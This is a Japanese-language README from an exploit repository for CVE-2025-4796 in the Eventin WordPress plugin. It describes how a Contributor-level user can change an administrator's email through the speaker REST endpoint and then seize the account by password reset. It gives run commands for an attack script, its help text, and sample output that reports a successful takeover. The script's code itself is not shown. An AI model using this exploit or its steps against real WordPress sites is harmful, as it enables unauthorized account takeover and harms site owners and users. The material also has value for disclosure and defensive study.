
Eventin <= 4.0.34 - 認証された(Contributor+)権限昇格 - ユーザーメール変更/アカウント乗っ取り
このリポジトリは、Eventin WordPressプラグイン(<= 4.0.34)における権限昇格の脆弱性を文書化したものです。この脆弱性により、Contributor+の権限を持つ認証済みユーザーが、プラグインのスピーカー更新APIを介して任意のユーザーのメールアドレスを変更できます。管理者のメールアドレスを変更することで、攻撃者はパスワードリセットをトリガーし、アカウントを乗っ取ることができます。
Eventinは、スピーカー/ユーザー詳細(特にメール)を更新する前に、呼び出し元のIDや権限を適切に検証しません。Contributor(またはそれ以上)として認証された攻撃者は、プラグインのRESTエンドポイントを使用して、管理者を含む他のユーザーのメールアドレスを変更できます:
メールアドレスが攻撃者制御のアドレスに変更されると、標準のWordPressパスワードリセットフローを使用してアカウントを乗っ取ることができます。
Filename: CVE-2025-4796.py
このスクリプトは以下の手順を自動化します:
/wp-json/eventin/v2/speakers/<speaker_id>に送信してスピーカーのメールを更新します。必要条件:
インストール:
pip install requests
コマンドラインからスクリプトを実行します:
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password
スクリプトのヘルプを表示:
python CVE-2025-4796.py -h
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD
Exploit For: CVE-2025-4796 By: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-id, --speaker_id SPEAKER_ID
Enter the speaker ID for the user
-email, --email EMAIL
Enter a new email address
-user, --username USERNAME
Enter the username for the account to upgrade
-pass, --password PASSWORD
Enter the password for the account to upgrade
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...
[+] Exploitation in progress, please wait ...
[+] Exploitation successful.
[+] The account has been updated to Admin.
Speaker ID : 9
Email : [email protected]
[!] Please reset your password using the email: [email protected]
作成者: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/